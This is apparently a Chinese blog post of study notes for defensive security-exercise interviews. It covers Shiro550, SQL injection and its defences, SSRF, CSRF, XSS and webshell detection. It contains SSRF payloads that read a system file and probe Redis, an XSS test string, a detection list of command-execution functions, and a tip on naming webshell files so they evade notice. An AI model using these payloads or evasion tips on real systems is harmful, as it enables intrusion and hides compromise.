<h3 id="版本问题"><a href="#版本问题" class="headerlink" title="版本问题"></a>版本问题</h3><p>1、Shiro框架1.2.4版本之前的登录时默认是先验证”rememberMe” Cookie的值，而不是先进行身份验证，这也是Shiro550漏洞能够利用的原因之一，攻击者可以利用该漏洞通过伪造”rememberMe” Cookie的值来绕过Shiro框架的身份认证机制，从而实现未授权访问</p>
<p>2、Shiro框架1.2.4版本之后的登录时先进行身份验证，而不是先验证”rememberMe” Cookie的值，所以攻击者需要知道受害者已经通过登录验证，并且Shiro框架已经为受害者创建了一个有效的会话，以便攻击者可以利用该会话ID进行身份伪造并绕过Shiro框架的权限控制机制</p>
<p>3、同时，Shiro框架的登录流程也是可以自定义的<br><a target="_blank" rel="noopener" href="https://blog.csdn.net/m0_55793759/article/details/129398462">https://blog.csdn.net/m0_55793759/article/details/129398462</a></p>
<h1 id="sql注入原理"><a href="#sql注入原理" class="headerlink" title="sql注入原理"></a>sql注入原理</h1><p>程序员没有遵循代码与数据分离原则，使用户数据作为代码执行。</p>
<p>sql注入的利用，使用联合查询，报错注入，二次注入，盲注，堆叠注入，宽字节注入的方式在数据库中获取敏感信息</p>
<h1 id="防御"><a href="#防御" class="headerlink" title="防御"></a>防御</h1><h2 id="1-严格的数据类型"><a href="#1-严格的数据类型" class="headerlink" title="1.严格的数据类型"></a>1.严格的数据类型</h2><p>在传入参数的地方限制参数的类型，比如整型 Integer，随后加入函数判断，如is_numeric($_GET[‘id’]) 只有当 get 到的 id 为数字或者数字字符时才能执行下一步。但这种方法存在一定的限制，只能在特定的页面才能使用，一般大部分都是要求我们传入的字符串，但可以很大程度限制整型注入的情况。</p>
<h2 id="2-特殊字符转义"><a href="#2-特殊字符转义" class="headerlink" title="2.特殊字符转义"></a>2.特殊字符转义</h2><p>数字型注入可以通过检查数据类型防御，字符型则需要对特殊字符进行转义。在 MySQL 中我们需要对” ‘进行转义，这样可以防止恶意攻击者来闭合语句。我们通常使用 addslashes() 等安全函数来转义特殊字符。</p>
<h2 id="3-使用预编译语句"><a href="#3-使用预编译语句" class="headerlink" title="3.使用预编译语句"></a>3.使用预编译语句</h2><p>当一条 SQL 语句执行前，需要先进行语法分析。如果没有使用预编译的方法来执行 SQL，那么每次在执行 SQL 时都需要先进行语法分析，然后再执行。此时进行 SQL 注入，恶意的代码(payload)拼接上 SQL 语句之后才会进行语法分析，其中 payload 中包含的关键字等内容便会被识别，因此会被成功执行。</p>
<p>而预编译则是先在待传入参数的位置增加占位符(?)，并对 SQL 语句进行语法分析和编译，并将结果存入内存中等待调用。在调用时，传入的参数会自动放入占位符的位置，并执行 SQL 语句。此时如果进行注入，由于并没有重新进行语法分析，payload 中包含的关键字等不会被识别，而是作为字符串的形式存在于语句中，因此 payload 不会成为 SQL 语句的一部分。</p>
<p><strong>预编译可以防止 sql 注入的原因</strong>：允许数据库做参数化查询。在使用参数化查询的情况下，数据库不会将参数的内容视为 SQL 执行的一部分，而是作为一个字段的属性值来处理，这样就算参数中包含破环性语句（or ‘1&#x3D;1’）也不会被执行。</p>
<h1 id="报错函数"><a href="#报错函数" class="headerlink" title="报错函数"></a>报错函数</h1><p>extractvalue</p>
<p>updatexml</p>
<p>floor()</p>
<h1 id="XSS如何绕过HttpOnly获取Cookie"><a href="#XSS如何绕过HttpOnly获取Cookie" class="headerlink" title="XSS如何绕过HttpOnly获取Cookie"></a>XSS如何绕过HttpOnly获取Cookie</h1><p>利用phpinfo获取cookie</p>
<p>Apache漏洞获取cookie</p>
<p>XSS与CORS漏洞利用</p>
<h1 id="安全设备"><a href="#安全设备" class="headerlink" title="安全设备"></a>安全设备</h1><p>天眼</p>
<p>椒图</p>
<p>奇安信的edr（终端安全响应系统）</p>
<p>奇安信的ids（入侵检测系统 ）</p>
<p>长亭的蜜罐谛听</p>
<p>青藤云的IDS</p>
<p>深信服的IDS、IPS(入侵防御系统 )</p>
<h1 id="ssrf（服务器请求伪造）"><a href="#ssrf（服务器请求伪造）" class="headerlink" title="ssrf（服务器请求伪造）"></a>ssrf（服务器请求伪造）</h1><p>利用服务端的有代理请求功能，服务器根据用户输入，再服务器端构造一个url，并向其发送一个请求，通过访问其他的服务端资源来完成正常的页面展示，但用户提交的url是操作内网的敏感资源，可能会修改服务器的状态，造成提权，或泄密</p>
<p>url伪协议</p>
<p>用file协议去获取文件内容url&#x3D;file:&#x2F;&#x2F;&#x2F;C:&#x2F;Windows&#x2F;win.ini</p>
<p>dict字典服务器协议；dict:&#x2F;&#x2F;&#x2F;ip:6739&#x2F;info(检测端口)</p>
<p>tftp简单文件传输协议</p>
<p>gopher:&#x2F;&#x2F;分布式文档传递服务</p>
<p>redis的默认端口6379</p>
<h1 id="态势感知如何验证文件上传漏洞的真假"><a href="#态势感知如何验证文件上传漏洞的真假" class="headerlink" title="态势感知如何验证文件上传漏洞的真假"></a>态势感知如何验证文件上传漏洞的真假</h1><p>通过态势感知系统，你可以监控网络流量和服务器日志如果发现与文件上传相关的异常活动，那么可能需要进一步调查是否存在文件上传漏洞。</p>
<h1 id="端口异常"><a href="#端口异常" class="headerlink" title="端口异常"></a>端口异常</h1><p>1</p>
<p>netstat -ano  查看端口对应的进程号</p>
<p>2</p>
<p>tasklist | findstr “进程号”</p>
<p>3</p>
<p>taskkill &#x2F;f &#x2F;t &#x2F;in “应用名称”</p>
<h1 id="csrf（跨站请求伪造）"><a href="#csrf（跨站请求伪造）" class="headerlink" title="csrf（跨站请求伪造）"></a>csrf（跨站请求伪造）</h1><p>csrf是借助用户之手去发布恶意请求</p>
<h3 id="CSRF-GET："><a href="#CSRF-GET：" class="headerlink" title="CSRF GET："></a><strong>CSRF GET：</strong></h3><ol>
<li>Bob 创建了含有 GET 请求的恶意链接</li>
<li>Bob 通过聊天工具、邮件或网站传播恶意链接</li>
<li>Alice 点击了恶意链接</li>
<li>以 Alice 的身份发起了 GET 请求</li>
<li>服务端以 Alice 认证的 Cookie 来处理请求</li>
<li>服务端按照 Alice 的身份更新了状态（Alice 并不知情）</li>
</ol>
<h3 id="CSRF-POST："><a href="#CSRF-POST：" class="headerlink" title="CSRF POST："></a><strong>CSRF POST：</strong></h3><ol>
<li>Bob 创建了恶意网页</li>
<li>Bob 传播该网页</li>
<li>Alice 点击恶意网页并提交了表单（可能有填写动作、也可能是自动提交）</li>
<li>表单发起提交到另一个站点的 POST 请求</li>
<li>服务端以 Alice 身份处理 POST 请求</li>
<li>服务端状态已改变</li>
</ol>
<h4 id="csrf如何防御–cookie设置httpOnly-token验证-隐藏令牌-Referer验证"><a href="#csrf如何防御–cookie设置httpOnly-token验证-隐藏令牌-Referer验证" class="headerlink" title="csrf如何防御–cookie设置httpOnly+token验证+隐藏令牌+Referer验证"></a>csrf如何防御–cookie设置httpOnly+token验证+隐藏令牌+Referer验证</h4><p>（1）csrf利用浏览器的cookie，为了防止xss盗用cookie，在cookie中设置httponly属性，通过程序（javasc脚本，applet等）无法读取cookie信息，避免伪造cookie</p>
<p>设httponly</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">response.setHeader( &quot;Set-Cookie&quot;, &quot;cookiename=cookievalue;HttpOnly&quot;);</span><br></pre></td></tr></table></figure>

<p>(2)token验证</p>
<p>服务器发送给客户端一个token，客户端的表单带这个token（不能从cookie获取）</p>
<p>如果是post方式，在相应表单中增加一个隐藏域，<input type="hidden" name="_toicen" value="tokenvalue"/>，token也是通过服务器生成，表单提交的token值通过post请求域参数带到服务端，会话带相同token，会话过期token失效</p>
<p>（3）隐藏令牌：把token隐藏带head头中</p>
<p>（4）referer验证：只接受本站的请求</p>
<h4 id="1、XSS的基本概念：XSS（Cross-Site-Scripting）：跨域脚本攻击。"><a href="#1、XSS的基本概念：XSS（Cross-Site-Scripting）：跨域脚本攻击。" class="headerlink" title="1、XSS的基本概念：XSS（Cross Site Scripting）：跨域脚本攻击。"></a>1、XSS的基本概念：XSS（Cross Site Scripting）：跨域脚本攻击。</h4><p>2、XSS攻击原理：不需要你做任何的登录认证，它会通过合法的操作（比如在url中输入、在评论框中输入），向你的页面注入脚本（可能是js、html代码块等）。</p>
<p>3、XSS攻击后果：盗用Cookie破坏页面的正常结构，插入广告等恶意内容D-doss攻击</p>
<p>4、XSS的攻击方式<br>a. 反射型：发出请求时，XSS代码出现在url中，作为输入提交到服务器端，服务器端解析后响应，XSS代码随响应内容一起传回给浏览器，最后浏览器解析执行XSS代码。这个过程像一次反射，所以叫反射型XSS。<br>b.存储型：存储型XSS和反射型XSS的差别在于，提交的代码会存储在服务器端（数据库、内存、文件系统等），下次请求时目标页面时不用再提交XSS代码。</p>
<h1 id="xss防御"><a href="#xss防御" class="headerlink" title="xss防御"></a>xss防御</h1><p>XSS的防范措施主要有三个：编码、过滤、校正<br>1、编码：对用户输入的数据进行HTML Entity 编码。把字符转换成 转义字符。Encode的作用是将$var等一些字符进行转化，使得浏览器在最终输出结果上是一样的。<br>比如说这段代码：<script>alert(1)</script><br>若不进行任何处理，则浏览器会执行alert的js操作，实现XSS注入。进行编码处理之后，L在浏览器中的显示结果就是这个文本，将变量作为纯文本进行输出，且不引起JavaScript的执行。</p>
<p>2、过滤：移除用户输入的和事件相关的属性。如onerror可以自动触发攻击，还有onclick等。（总而言是，过滤掉一些不安全的内容）移除用户输入的Style节点、Script节点、Iframe节点。（尤其是Script节点，它可是支持跨域的呀，一定要移除）。</p>
<p>3、校正：避免直接对HTML Entity进行解码。使用DOM Parse转换，校正不配对的DOM标签。(DOM Parse：它的作用是把文本解析成DOM结构)<br>常见2种方法：a.第一步的编码转成文本，然后第三步转成DOM对象，然后经过第二步的过滤。 b.还有一种更简洁：首先是encode，如果是文本，就白名单。</p>
<h1 id="CSRF-和-XSS-的区别"><a href="#CSRF-和-XSS-的区别" class="headerlink" title="CSRF 和 XSS 的区别"></a>CSRF 和 XSS 的区别</h1><p>1.csrf是跨站请求伪造；xss是跨域脚本攻击</p>
<p>2.csrf需要用户先登录网站a，获取cookie；xss不需要登录</p>
<p>3.csrf是利用网站a本身的漏洞，去请求网站a的api；xss是向网站a注入js代码，然后执行js代码，篡改网站a的内容。（xss利用站点信任用户，csrf则是通过伪装来自信任用户的请求来利用网站即攻击者盗用你的身份，以你的名义向第三方网站发送恶意请求）</p>
<h1 id="webshell的检测"><a href="#webshell的检测" class="headerlink" title="webshell的检测"></a>webshell的检测</h1><p>1</p>
<p>web扫描&#x2F;爬虫&#x2F;google hack检测</p>
<p>2</p>
<p>基于web日志的检测（看到可疑的文件名或后缀.php,.asp,jsp）</p>
<p><img src="/2024/04/18/%E6%8A%A4%E7%BD%91%E5%9F%BA%E6%9C%AC%E9%97%AE%E9%A2%98/12.png" alt="护网基本问题"></p>
<p><img src="C:\Users\86139\AppData\Roaming\Typora\typora-user-images\image-20240520213951267.png" alt="image-20240520213951267"></p>
<p><img src="C:\Users\86139\AppData\Roaming\Typora\typora-user-images\image-20240520214548765.png" alt="image-20240520214548765"></p>
<p><img src="/2024/04/18/%E6%8A%A4%E7%BD%91%E5%9F%BA%E6%9C%AC%E9%97%AE%E9%A2%98/13.png" alt="护网基本问题"></p>
<p>3</p>
<p>基于文件属性</p>
<p><img src="/2024/04/18/%E6%8A%A4%E7%BD%91%E5%9F%BA%E6%9C%AC%E9%97%AE%E9%A2%98/22.png" alt="护网基本问题"></p>
<p><img src="C:\Users\86139\AppData\Roaming\Typora\typora-user-images\image-20240521202426360.png" alt="image-20240521202426360"></p>
<p>4</p>
<p>基于文件内容的检测（比如system，eval,exec,shell_exec等可以命令执行的函数）</p>
<p><img src="/2024/04/18/%E6%8A%A4%E7%BD%91%E5%9F%BA%E6%9C%AC%E9%97%AE%E9%A2%98/10.png" alt="护网基本问题"></p>
<p><img src="C:\Users\86139\AppData\Roaming\Typora\typora-user-images\image-20240520212557340.png" alt="image-20240520212557340"></p>
<p><img src="/11.png" alt="护网基本问题"></p>
<p>码子最好是</p>
<p>1  asdfahfdh123424.php(名字随便打的20位)</p>
<p>2  路径_路径.php(网站路径)    乱糟糟或贼逼真</p>
<p>针对webshell特征的小工具</p>
<p><img src="/2024/04/18/%E6%8A%A4%E7%BD%91%E5%9F%BA%E6%9C%AC%E9%97%AE%E9%A2%98/23.png" alt="护网基本问题"></p>
<p><img src="/2024/04/18/%E6%8A%A4%E7%BD%91%E5%9F%BA%E6%9C%AC%E9%97%AE%E9%A2%98/24.png" alt="护网基本问题"></p>
<p><img src="C:\Users\86139\AppData\Roaming\Typora\typora-user-images\image-20240521203457274.png" alt="image-20240521203457274"></p>
<p>webshell的防范</p>
<p><img src="/2024/04/18/%E6%8A%A4%E7%BD%91%E5%9F%BA%E6%9C%AC%E9%97%AE%E9%A2%98/25.png" alt="护网基本问题"></p>
<p><img src="C:\Users\86139\AppData\Roaming\Typora\typora-user-images\image-20240521203710026.png" alt="image-20240521203710026"></p>

                    </div>
</div>

    <div class="cube-article-nav">
        <ul>
            
                <li class="prev">
                    <a href="/2024/05/19/ctfphp%E8%BF%9E%E6%8E%A5%E6%95%B0%E6%8D%AE%E5%BA%93/">
                        <i class="cube-icon cube-prev" aria-hidden="true"></i>
                        ctfphp连接数据库
                    </a>
                </li>
                
                    
                        <li class="next">
                            <a href="/2024/04/16/%E6%B5%8B%E8%AF%95%E6%96%87%E7%AB%A0/">
                                测试文章
                                    <i class="cube-icon cube-next" aria-hidden="true"></i>
                            </a>
                        </li>
                        
        </ul>
    </div>
    
        
            <!-- TODO 根据theme.comment的内容进行入口选择 -->

                
        </div>
        <div class="cube-right">
            

<div class="cube-search cube-sidebar" id="cube-search">
    <div class="search-container">
        <input type="text" placeholder="Search" class="cube-search-input" id="cube-search-input">
        <i class="cube-icon cube-icon-search cube-search-submit" aria-hidden="true"></i>
    </div>
    <!-- TODO 通过给window赋一个全局变量，通过脚本赋值 -->
</div>
<script>
    (function (window) {
        'use strict';
        window.searchModule = {}
        window.searchModule.JSONUrl = '/content.json'
        window.searchModule.rootUrl = '/'
    })(window)
</script>
<div class="cube-search-form">
    <div class="cube-search-control">
        <input type="text" placeholder="Search" class="search-input">
        <a class="close-button">
            <i class="cube-icon cube-close" aria-hidden="true"></i>
        </a>
    </div>
    <div class="cube-search-result"></div>
</div>


<div class="cube-author cube-sidebar" id="cube-author">
    
    
    <span>John Doe</span>
    
    
    <div class="count">
        <a class="count articles"><span>19</span>Article</a>
        <a class="count tags"><span>0</span>Tags</a>
        <a class="count categories"><span>0</span>Categories</a>
    </div>
</div>



<div class="cube-music cube-sidebar" id="cube-music">
    <div class="cube-player aplayer" id="cube-player"></div>
</div>
<script>
    (function (window) {
        window.musicModule = {}
        window.musicModule.musicConfig = '{"narrow":false,"autoplay":false,"showlrc":3,"theme":"#b7daff","mutex":true,"mode":"circulation","preload":"auto","listmaxheight":"513px","music":[{"title":"Dear friends","author":"TRIPLANE","url":"http://cube-1252774894.cosgz.myqcloud.com/music/source/TRIPLANE - Dear friends.mp3","lrc":"http://cube-1252774894.cosgz.myqcloud.com/music/lrc/Dear friends - TRIPLANE.lrc","pic":"http://cube-1252774894.cosgz.myqcloud.com/music/image/TRIPLANE - Dear friends.jpg"},{"title":"Butter-Fly","author":"和田光司","url":"http://cube-1252774894.cosgz.myqcloud.com/music/source/和田光司 - Butter-Fly (ピアノヴァージョン).mp3","lrc":"http://cube-1252774894.cosgz.myqcloud.com/music/lrc/Butter-Fly (ピアノヴァージョン) - 和田光司.lrc","pic":"http://cube-1252774894.cosgz.myqcloud.com/music/image/和田光司 - Butter-Fly (ピアノヴァージョン).jpg"},{"title":"宵闇花火","author":"葉月ゆら","url":"http://cube-1252774894.cosgz.myqcloud.com/music/source/葉月ゆら - 宵闇花火.mp3","lrc":"http://cube-1252774894.cosgz.myqcloud.com/music/lrc/宵闇花火 - 葉月ゆら.lrc","pic":"http://cube-1252774894.cosgz.myqcloud.com/music/image/葉月ゆら - 宵闇花火.jpg"}]}'
        window.musicModule.lrcConfig = {
            open: 'Open Lyrics',
            close: 'Close Lyrics'
        }
    })(window)
</script>



<div class="cube-recent-posts cube-sidebar" id="cube-recent-posts">
    <div class="title">
        <a>Recent Posts</a>
    </div>
    <ul class="list">
        
        
        <li>
            <!-- TODO 如果文章要显示图片，那么在front-matter上添加preview属性(url or path) -->
            
            <div class="normal">
                <p class="index first">
                    <span>1</span>
                </p>
                <p class="title">
                    <a href="/2024/08/01/MyFileServer/" title="MyFileServer">MyFileServer</a>
                </p>
            </div>
            
        </li>
        
        
        
        <li>
            <div class="normal">
                <p class="index">
                    <span>2</span>
                </p>
                <p class="title">
                    <a href="/2024/07/31/rtb1BaJi/" title="rtb1BaJi">rtb1BaJi</a>
                </p>
            </div>
        </li>
        
        
        
        <li>
            <div class="normal">
                <p class="index">
                    <span>3</span>
                </p>
                <p class="title">
                    <a href="/2024/07/31/xiaoBaChang/" title="xiaoBaChang">xiaoBaChang</a>
                </p>
            </div>
        </li>
        
        
        
        <li>
            <div class="normal">
                <p class="index">
                    <span>4</span>
                </p>
                <p class="title">
                    <a href="/2024/07/30/DC9-Try/" title="DC9-Try">DC9-Try</a>
                </p>
            </div>
        </li>
        
        
        
        <li>
            <div class="normal">
                <p class="index">
                    <span>5</span>
                </p>
                <p class="title">
                    <a href="/2024/07/30/DC8-Try/" title="DC8-Try">DC8-Try</a>
                </p>
            </div>
        </li>
        
        
    </ul>
</div>







<div class="cube-links cube-sidebar" id="cube-links">
    <div class="title">
        <a>Links</a>
    </div>
    <ul class="list">
        
        <li>
            
            
            <img src="http://cube-1252774894.cosgz.myqcloud.com/links/GitHub.png">
            
            <a href="https://github.com/ZEROKISEKI" target="_blank">GitHub</a>
        </li>
        
        <li>
            
            
            <img src="http://cube-1252774894.cosgz.myqcloud.com/links/Coding.png">
            
            <a href="https://coding.net/u/SORA1" target="_blank">Coding</a>
        </li>
        
        <li>
            
            
            <img src="http://cube-1252774894.cosgz.myqcloud.com/links/SF.png">
            
            <a href="https://segmentfault.com/u/aonosora" target="_blank">SF社区</a>
        </li>
        
        <li>
            
            
            <img src="http://cube-1252774894.cosgz.myqcloud.com/links/开发者头条.png">
            
            <a href="https://toutiao.io/u/148070" target="_blank">开发者头条</a>
        </li>
        
    </ul>
</div>



<div class="cube-friend-links cube-sidebar" id="cube-friend-links">
    <div class="title">
        <a>Friend Links</a>
    </div>
    <ul class="list">
        
        <li>
            <!-- TODO change avatar.png to friend.png-->
            <img src="http://cube-1252774894.cosgz.myqcloud.com/friend_links/micblo.png">
            <a href="https://blog.micblo.com/" target="_blank">罗大佬</a>
        </li>
        
        <li>
            <!-- TODO change avatar.png to friend.png-->
            <img src="http://cube-1252774894.cosgz.myqcloud.com/friend_links/DIYgod.jpg">
            <a href="https://www.anotherhome.net/" target="_blank">DIYgod</a>
        </li>
        
        <li>
            <!-- TODO change avatar.png to friend.png-->
            <img src="/images/friend_links.jpg ">
            <a href="https://aonosora.com/" target="_blank">咪西西の部落格</a>
        </li>
        
    </ul>
</div>


        </div>
    </div>
</div>
<footer class="cube-footer">
    
© 2017 John Doe

<br>
Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>.&nbsp;Theme by <a href="https://github.com/ZEROKISEKI" target="_blank">AONOSORA</a>
</footer>
<!-- inject:script -->
<script src="/js/script.js"></script>
<!-- endinject -->
<div class="cube-loading out"></div>
</body>
</html>